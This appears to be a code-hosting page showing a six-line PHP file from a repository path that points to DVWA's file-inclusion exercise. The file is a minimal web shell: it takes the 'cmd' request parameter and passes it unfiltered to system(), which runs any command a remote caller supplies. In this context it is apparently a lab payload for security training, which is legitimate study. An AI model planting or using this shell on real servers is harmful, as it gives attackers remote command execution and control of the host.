cspj-application/dvwa/file-inclusion
2025-02-06 06:56:15 +08:00

6 lines
75 B
Plaintext

<?php
if(isset($_GET['cmd'])) {
system($_GET['cmd']);
}
?>